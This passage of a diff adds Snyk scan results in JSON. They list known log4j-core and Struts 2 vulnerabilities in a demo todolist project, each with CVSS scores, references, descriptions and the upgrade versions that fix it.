] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-17T18:23:58.542986Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-17T18:20:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-18T07:05:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.516498Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta7,2.3.2)", + "[2.4,2.12.4)", + "[2.13.0,2.17.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.2", + "2.12.4", + "2.17.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.6, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", + "title": "Jira Issue" + }, + { + "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", + "title": "Openwall Mail" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:47.220633Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", + "epssDetails": { + "percentile": "0.89602", + "probability": "0.02239", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44832" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-28T19:42:55.818691Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-28T19:42:53Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-28T20:17:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.472982Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", + "title": "Man-in-the-Middle (MitM)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.13.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.13.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [ + { + "version": [ + "[2.6,2.13.2)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/net/SmtpManager.java", + "className": "SmtpManager", + "functionName": "getSmtpManager" + } + }, + { + "version": [ + "[2.0-rc2,2.5)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/net/SmtpManager.java", + "className": "SmtpManager", + "functionName": "getSMTPManager" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html", + "title": "Atlassian Patch" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-2819", + "title": "Jira Issue" + }, + { + "url": "https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9", + "title": "Reload4j Fix Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "low", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 3.7, + "modificationTime": "2024-03-11T09:51:18.869400Z" + }, + { + "assigner": "Red Hat", + "severity": "low", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 3.7, + "modificationTime": "2024-03-11T09:53:58.100685Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-14T11:19:13.272608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:18.869400Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Red Hat", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.100685Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Man-in-the-Middle (MitM). Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.13.2 or higher.\n## References\n- [Atlassian Patch](https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-2819)\n- [Reload4j Fix Commit](https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9)\n", + "epssDetails": { + "percentile": "0.56903", + "probability": "0.00191", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9488" + ], + "CWE": [ + "CWE-297" + ], + "GHSA": [ + "GHSA-vwqq-5vrc-xw9h" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2020-04-28T15:10:06.231410Z", + "functions_new": [ + { + "version": [ + "[2.6,2.13.2)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.net.SmtpManager", + "functionName": "getSmtpManager" + } + }, + { + "version": [ + "[2.0-rc2,2.5)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.net.SmtpManager", + "functionName": "getSMTPManager" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-27T17:16:14Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2020-04-28T17:16:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-14T11:19:13.272608Z", + "socialTrendAlert": false, + "severityWithCritical": "low", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.13.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-2635340", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "Chris McCown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.5.30)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.5.30" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe", + "title": "GitHub Commit" + }, + { + "url": "https://securitylab.github.com/research/apache-struts-double-evaluation/", + "title": "GitHub Security Lab - Double Evaluation in Struts" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-062", + "title": "Struts Security Advisory" + }, + { + "url": "https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html", + "title": "Write Up & PoC" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:49:12.874796Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:56.453682Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:12.874796Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The fix issued for [CVE-2020-17530](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-1049003) was incomplete. Some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the `%{...} syntax`. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.30 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe)\n- [GitHub Security Lab - Double Evaluation in Struts](https://securitylab.github.com/research/apache-struts-double-evaluation/)\n- [Struts Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-062)\n- [Write Up & PoC](https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml)\n", + "epssDetails": { + "percentile": "0.96232", + "probability": "0.18558", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-31805" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2022-04-12T20:32:06.687703Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-12T20:27:34Z", + "exploitDetails": { + "sources": [ + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2022-04-12T20:33:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:18.536966Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.30" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30060", + "title": "Manipulation of Struts' internals", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Viettel Information Security Center" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.24.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.24.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "http://struts.apache.org/docs/s2-026.html", + "title": "Vulnerability Summary" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:56.364720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "description": "## Overview\n`ValueStack` defines special `top` object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings.\n\n## References\n- [http://struts.apache.org/docs/s2-026.html](http://struts.apache.org/docs/s2-026.html)\n", + "epssDetails": { + "percentile": "0.70008", + "probability": "0.00305", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-5209" + ], + "CWE": [ + "CWE-284" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-07-01T16:51:56Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2015-07-01T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:01.496065Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30770", + "title": "Command Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.20.2)", + "[2.3.24, 2.3.24.2)", + "[2.3.28, 2.3.28.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.20.2", + "2.3.24.2", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081", + "title": "NVD" + }, + { + "url": "https://www.exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:02.554699Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Command Injection. When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n", + "epssDetails": { + "percentile": "0.99987", + "probability": "0.97524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3081" + ], + "CWE": [ + "CWE-77" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.315000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-04-22T04:32:51Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-04-22T04:32:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:20.892839Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30773", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.3.28)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.28" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/5421930b49822606792f36653b17d3d95ef106f9", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/72471d7075681bea52046645ad7aa34e9c53751e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/a89bbe22cd2461748d595a89a254de888a415e6c", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:54.345030Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:27.272926Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:54.345030Z" + } + ], + "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nCross-site Scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.\n\n## Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n### Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n### Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n### How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003)", + "epssDetails": { + "percentile": "0.88699", + "probability": "0.01905", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4003" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.353000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-03-16T06:52:13.014000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-03-16T06:52:13.014000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:54.345030Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": 